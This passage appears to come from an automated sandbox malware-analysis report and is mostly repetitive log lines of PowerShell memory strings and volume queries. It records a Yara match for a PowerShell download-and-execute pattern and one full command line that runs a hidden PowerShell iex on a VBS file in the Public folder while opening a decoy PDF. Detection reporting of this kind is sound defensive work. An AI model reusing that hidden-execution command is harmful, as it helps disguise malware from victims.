      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3367061290.000002AEC0A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3371106448.000002AEC6258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B80228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2182907238.0000018B81C34000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_2244.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2244, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
